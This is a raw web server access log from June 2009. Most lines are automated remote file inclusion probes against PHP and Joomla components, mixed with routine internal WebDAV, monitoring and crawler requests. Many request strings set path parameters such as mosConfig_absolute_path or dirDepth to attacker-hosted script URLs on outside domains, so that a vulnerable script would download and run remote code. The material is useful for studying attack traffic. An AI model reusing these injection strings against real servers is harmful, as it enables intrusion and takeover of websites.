216.139.67.116 - - [24/Jun/2009:07:48:12 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
83.98.209.71 - - [24/Jun/2009:07:48:23 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 253 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:48:23 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:48:23 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:48:35 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:48:35 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:48:35 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
123.242.165.138 - - [24/Jun/2009:07:48:39 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
172.16.1.80 - - [24/Jun/2009:07:48:39 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:48:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:07:48:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [24/Jun/2009:07:48:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.93.53.109 - - [24/Jun/2009:07:48:51 -0400] "GET /logs/access_log.Q109061500%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.32.56.166 - - [24/Jun/2009:07:49:00 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
216.139.67.116 - - [24/Jun/2009:07:49:10 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.116 - - [24/Jun/2009:07:49:10 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.116 - - [24/Jun/2009:07:49:11 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
172.16.1.180 - - [24/Jun/2009:07:49:21 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:49:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:49:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
83.98.209.71 - - [24/Jun/2009:07:49:22 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:49:23 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
216.139.67.116 - - [24/Jun/2009:07:49:23 -0400] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 253 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
124.32.56.166 - - [24/Jun/2009:07:49:23 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
216.139.67.116 - - [24/Jun/2009:07:49:23 -0400] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 248 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
83.98.209.71 - - [24/Jun/2009:07:49:31 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:49:31 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:49:34 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:49:34 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
216.139.67.116 - - [24/Jun/2009:07:49:35 -0400] "GET /logs/access_log.Q109050900%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:50:00 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:50:02 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
172.16.1.180 - - [24/Jun/2009:07:50:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:50:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:50:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:07:50:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:07:50:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:07:50:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
91.121.156.60 - - [24/Jun/2009:07:50:48 -0400] "GET /logs/access_log.Q109052300//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:07:50:49 -0400] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:07:50:49 -0400] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.826"
63.223.104.57 - - [24/Jun/2009:07:51:03 -0400] "GET /logs/error_log.Q109061000//?_zb_path=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
193.243.139.4 - - [24/Jun/2009:07:51:07 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:51:07 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:51:08 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:51:09 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:51:09 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:07:51:09 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
83.16.182.130 - - [24/Jun/2009:07:51:13 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:51:13 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.16.182.130 - - [24/Jun/2009:07:51:13 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:51:18 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:51:18 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:51:18 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:51:29 -0400] "GET /logs/access_log.Q109061500%20%20//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.180 - - [24/Jun/2009:07:51:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:51:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [24/Jun/2009:07:51:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
38.99.44.103 - - [24/Jun/2009:07:51:39 -0400] "GET /logs/error_log.Q107061500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
219.94.194.231 - - [24/Jun/2009:07:53:13 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
219.94.194.231 - - [24/Jun/2009:07:53:13 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
219.94.194.231 - - [24/Jun/2009:07:53:13 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.121.156.60 - - [24/Jun/2009:07:53:20 -0400] "GET /logs/error_log.Q109050600//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
216.139.67.116 - - [24/Jun/2009:07:53:39 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
209.59.12.99 - - [24/Jun/2009:07:53:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.156.60 - - [24/Jun/2009:07:53:44 -0400] "GET /logs/access_log.Q109052500%20//modules/My_eGallery/public/displayCategory.php?basepath=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 273 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:07:53:58 -0400] "GET /logs/error_log.Q109050600%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
210.4.77.148 - - [24/Jun/2009:07:53:59 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.4.77.148 - - [24/Jun/2009:07:54:11 -0400] "GET /logs/access_log.Q109051900%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:54:14 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:54:29 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.122.160.145 - - [24/Jun/2009:07:54:48 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://lanna-hospital.com/lnh/modules/infinity_menus/js/src/test.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
74.200.195.130 - - [24/Jun/2009:07:54:48 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:54:48 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:54:48 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:54:52 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:07:55:03 -0400] "GET /logs/error_log.Q107102800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.200.195.130 - - [24/Jun/2009:07:55:22 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:25 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:25 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:25 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:26 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:26 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:26 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:27 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:27 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:27 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:29 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:55:31 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:55:43 -0400] "GET /?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:55:43 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 6778 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:55:43 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:55:47 -0400] "GET /?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:55:47 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:55:47 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 6778 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
172.16.1.176 - - [24/Jun/2009:07:56:03 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:07:56:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:07:56:03 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.139.67.116 - - [24/Jun/2009:07:56:06 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:56:13 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:56:13 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:56:13 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:56:17 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:56:22 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
74.200.195.130 - - [24/Jun/2009:07:56:23 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:56:23 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:56:23 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:07:56:27 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:56:39 -0400] "GET /logs/error_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.93.53.109 - - [24/Jun/2009:07:56:40 -0400] "GET /logs/error_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.93.53.109 - - [24/Jun/2009:07:56:43 -0400] "GET /?DOCUMENT_ROOT=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:56:43 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:07:56:43 -0400] "GET /logs/?DOCUMENT_ROOT=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 200 6778 "-" "Mozilla/5.0"
219.94.194.231 - - [24/Jun/2009:07:57:35 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
219.94.194.231 - - [24/Jun/2009:07:57:35 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
219.94.194.231 - - [24/Jun/2009:07:57:35 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
219.94.194.231 - - [24/Jun/2009:07:57:35 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
193.243.139.4 - - [24/Jun/2009:07:57:35 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
